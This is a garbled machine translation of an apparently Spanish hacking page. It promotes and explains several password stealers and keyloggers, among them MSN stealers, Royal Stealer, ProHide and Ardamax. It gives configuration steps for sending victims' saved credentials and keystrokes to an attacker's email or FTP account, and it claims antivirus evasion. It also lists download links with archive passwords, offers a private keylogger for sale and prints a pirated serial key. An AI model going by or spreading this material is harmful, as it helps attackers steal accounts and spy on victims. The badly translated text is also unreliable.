Arhack MSN Password stealer
AMSNPS is a stealer simple created today by Arhack that sends for email the users and passwords avoided any version of MSN messenger.
Way of use basico
The alone program functions with accounts of gmail, since uses its servant smtp to send the emails, the user should be placed and password of an account gmail that was used for send the data, bearing a grudge to create an account exclusively for this.
The email with the passwords can be sent to any type of direccion.
Before creating the servant bearing a grudge to use the boton "to Test" to see if are well the data of configuration.
When they place the data of I send they give click to "to Create" and a new file was generated msnstealer.exe, this is the one that should be executed so that the data be sent.
The program obiamente alone sends the users and passwords kept (with recalling password) of msn, if itself is not found ningun user or password kept was sent an alone blank message with the info of the pc and the hour.
In the following image is seen that the server was executed in several pcs, in the holder of the message name of the pc is included and active user, in the message the data of users and passwords.
The server
The server is not added to the start, does not create files, neither modifies the registration, in conclusion does not modify absolutely nothing in the PC, upon executing it tries to send instantaneamente the data, once sends the data closes automaticamente. If it fails upon sending the data because there is not conexion to internet or any another motive reattempts to being sent the message. Upon I giving of today is undetectable to all the known antivirus, although I do not believe that time last long.
Arhack MSN Password stealer 1,0 Beta (rapidshare)
Arhack MSN Password stealer 1,0 Beta (megaupload)
Pass: troyanosyvirus. com. ar
Today salio the new one version of the Royal stealer, a stealer planned by Spanish Sharky.
As opposed to its version previous Royal Stealer v1.0, this rises the logs to a servant FTP, what avoids the mail accounts use.
Tambien I am added the opcion to spread the stealer by Till and by Rivaling and permits to select where to keep the stealer so that be initiated with Windows, opcion that at times very is not recommended, because it unico that causes is to fill the space of the servant FTP.
The Royal stealer 2 sends the following logs or passwords:
MSN messenger, Live messenger.
Firefox
Internet Explorer
CD-Keys of Play
CD-Keys of Software
Not-Ip
Now the logs tambien are sent encrypted for which is required to utilize the eyelash Viewfinder of log' s of the tool to be able to see them.
Add the necessary dependences to the discharges so that function well in any pc
It unloads
Royal stealer 2,0 (paginates official)
Pair by the web of sharkihttp://www.sharki.es
4n0-KeyFTP v1.4 is the new one version of the keylogger FTP of 4n0nym0us. In this new one version some bugs were corrected, him was translated to the English and I am added encriptacion in the logs to improve the security of the same. Tambien himself abandonment the stub 100% undetectable.
A keylogger captures the keys pressed in the pc where you be coaxed it, and in this case rises them a servant FTP user-defined.
To create the alone server should be created an account in some web where they give a servant ftp free as miarroba.com or lycos.com, despues we place the data where configuration of the servant says and we give click to build, that is all.
To see the logs we connect the servant FTP, by means of any client or browser or directly since the keylogger, we discharge the or the files. dat and we do click in the eyelash logs of the keylogger, despues we open the file. dat that we discharge and the logs to appear already desencriptados in screen. Without they are various they have to see one for one.
It unloads
4n0-KeyFTP v1.4 (rapidshare)
4n0-KeyFTP v1.4 (megaupload)
pass: troyanosyvirus. com. ar
This it is finalizes it version of the stealer of Sharki, finished today. 2 accounts were added of gmail and hotmail, so that alone with entering the mail of the user serve to send the data. Ademas some bugs were corrected and already themselves podria to consider a version stable.
The stealer sends for email all the passwords and following keys kept.
- It Personalized:
In this opcion a key of registration can be included by hand
In the options of the stealer.
- Software:
- Mozilla Firefox
- Windows Live Messenger
-Winzip
- PhotoShop 7,0
- Not-Ip
- mIrc
- Norton Antivirus
- Play:
- COD SAGA (the keys of the registration were fixed since were ill)
- Burnout Paradise
- Crysis Wars
- Counter Strike
- BattleField2
- RainbowSix
- The Gladiators
To continuacion an image of the file of text can be appreciated that arrives with the passwords and key despues to infect to it kills.
It fits to clarify that alone sends the passwords kept, and for now alone accepts mail of hotmail or gmail.
It BROUGHT UP TO DATE: THE STEALER NOT THIS FUNCTIONING, does NOT SEND THE PASSWORDS BECAUSE CLOSED THE ACCOUNTS OF GMAIL AND HOTMAIL. ALREADY they BROUGHT UP TO DATE IT.
They can see other stealers aqui.
It unloads
Royal Stealer v1.0e (rapidshare)
Royal Stealer v1.0e (megaupload)
Royal Stealer v1.0x (paginates official sharki.es, he is brought up to date)
It be passed for the web of the author, www.sharki.es
Odesa MSN password Stealer, is a program created by the Turkish one Odesa, that captures the passwords avoided the MSN of a remote pc and sends them via mail to the assailant. Or for the ones that already they know, is a simple one MSN stealer.
Use it simply they write the mail where the mails arrived and passwords of them you kill, they write the holder that tendra the message and they give click to "Build Stealer", a called file was created "Stealer" in the same folder where is found the builder. Despues if they want they can compress it with UPX, or to encrypt it in RC4 or ASM.
When they have the stealer ready they are sent it to it kills and in some minutes sent the message with their users and passwords to the mail that itself escogio previously.
In the following image they can see as the mail with the users arrives and passwords of it kills, like they see various tapeworm kills it mail and I send them to all with its respective passwords... (that kills is my another pc)
It unloads
Odesa MSN password Stealer 3 (rapidshare)
Odesa MSN password Stealer 3 (badongo)
pass: troyanosyvirus. com. ar
PasswordFox, IE PassView and ChromePass are 3 tools of nirsoft that permit to reveal the passwords of the browsers but acquaintances: Firefox, Internet Explorer and Google Chrome.
They permit to export the passwords and tambien can be controlled by means of the "linea of commands", what facilitates a lot of the "modificacion" of these programs, to use them with some botnet modified or algun programs particularly, of I throw already some applications were carried out that utilize several of the programs of nirsoft.
Ademas these tools are free, and they weigh less than 50kb each one for their maxima portabilidad. Alone it is needed to execute the aplicacion so that the data in the screen be shown.
Options of linea of command:
/stext
Save the list of passwords into to regular text file.
/stab
Save the list of passwords into to tab-delimited text file.
/scomma
Save the list of passwords into to comma-delimited text file.
/stabular
Save the list of passwords into to tabulate text file.
/shtml
Save the list of passwords into HTML file (Horizontal).
/sverhtml
Save the list of passwords into HTML file (Vertical).
/sxml
Save the list of passwords to XML file.
You unload:
IE PassView in Spanish (rapidshare)
PasswordFox in Spanish (rapidshare)
ChromePass (rapidshare)
IE PassView (Paginates official)
PasswordFox (Paginates official)
ChromePass (Paginates official)
He paginates official: www.nirsoft.net
Prohide keylogger is a new one keylogger undetectable with caracteristicas unicas:
+ Logs of completely innovative captures:
-The logs read themselves in HTML simple, they are a lot but faciles to read that the of other keyloggers known, aqui an example.
-They capture all the keys (space, shift, ctrl, backspace, etc)
-Capture the processes where are carried out the pusaciones (for example in the MSN window: MAURO conversacion)
-Start time capture and end
+ Ocultacion advanced:
-Undetectable to all the antivirus during I scan and ejecucion.
-It possesses new metodos to be attacked the heruistica of the antivirus but acquaintances.
-It is executed in failures-proof way and demas
For now there are two versions, a version demo local and another version full private with downloader.
ProHide Remote Keylogger demo version
This version of the prohide keylogger is localities, that is to say that alone can be used in a computer where can have access fisico, but can be hidden to avoid you suspect.
The logs are kept in the same pc and permits to begin or to cancel the beatings with a single click.
It unloads:
ProHide Remote Keylogger demo version (rapidshare)
ProHide Remote Keylogger demo version (mirror miarroba)
ProHide Remote Keylogger full private.
This version is remote, can be installed in any pc without being detected, this for sale by being a version private.
Caracteristicas:
+ Undetectable
-By being of sale limited can be assured indetectabilidad total by life for the antivirus but acquaintances
+ Remote
+ Ascent of the logs by means of FTP
-Possibility to test it
+ Downloader included
-It permits to select the time of wait
-It permits to test it
+ Possibility to Change the icon
+ Very configurable
-Eleccion of the interval of each log
-Possibility to kill the keylogger
-To kill process upon executing
-Possibility to keep the configuration
-Is very facil to configure
+ Password of security for the user
This version this for sale and be to sold a quantity limited to avoid that be detected by the antivirus.
The prohide remote keylogger full private has a price of 50 USD (dolares estadounedenses). Tambien versions according to their needs are carried out, in this case the price is fixed with the programmer. For purchases or consult you add me to my msn gbl-hack @ hotmail.com, they send me a message or they contact me with the form of it paginates of contact.
SALES CANCELED
Universal 1337 it is a capturador of passwords of all types, can send the data to a servant ftp or to an account of mail.
The server is enough detected and heavy (1.6Mb), but includes options to eliminate firewall and antivirus, tambien includes a downloader.
And it it can be encrypted easily without breaking the server with any encriptador.
Tambien permits to change the icon of the server, to show message upon being executed, to change the extension of the server etc.
Bearing a grudge to be created an account ftp or of email exclusive for this program.
Images:
Some of the password that captures:
Steam
Produkt Keys
Network Passes
Paypal
Ebay
AIM
ICQ
Miranda
Trillian
MSN Messenger
AOL Instant Messenger
Windows Messenger (In Windows XP und View)
Windows Live Messenger (In Windows XP und View)
Yahoo Messenger
Google Talk
GAIM (Pidgin)
Windows Mail
Outlook Express
Microsoft Outlook
IncrediMail
Eudora
Netscape
Mozilla Firefox
Internet Explorer
Group Mail Free
PC Infos
It unloads:
Universal 1337 V2
Ardamax Keylogger is a utility that captures all the information introduced through the keyboard, keeping it immediately in a card index log that you can revise when want.
In this way, you can be up to date with the use that him is given to your PC when been not present, or can control the adventures of your children on the Internet.
Yourself can configure the program so that keep the log in format TXT or HTML, and to record also retails as the date and hour of the capture of the text, and what application was being used.
Besides, you have the option to execute the program in way "hidden", that does it completely invisible to the user, and permits to control it without this realize. Another interesting function is the possibility to send the card indexes log with the data kept to a determined email address from time to time: perfect to continue watching even to distance!
Image of the screen prinsipal:
Dischargeing Ardamax Keylogger 2,8 (418Kb since it paginates of the author ardamax.com)
Them abandonment the series of the ardamax keylogger 2,8. Ponerolo before installing it vaguely
Name: h4xbr
Series: PEEIUROHJBTBEHF
Presnet in http://electroman.tk
by Mr_electroman